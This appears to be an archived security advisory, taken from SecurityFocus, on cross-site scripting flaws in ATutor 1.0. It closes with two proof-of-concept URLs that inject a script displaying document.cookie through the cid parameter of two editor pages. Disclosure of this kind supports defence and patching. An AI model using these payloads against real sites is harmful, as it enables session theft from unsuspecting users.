11 lines
No EOL
679 B
Text
11 lines
No EOL
679 B
Text
source: https://www.securityfocus.com/bid/43241/info
|
|
|
|
ATutor is prone to multiple cross-site scripting vulnerabilities.
|
|
|
|
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
|
|
ATutor 1.0 is vulnerable, other versions may also be affected.
|
|
|
|
http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
|
|
|
|
http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script> |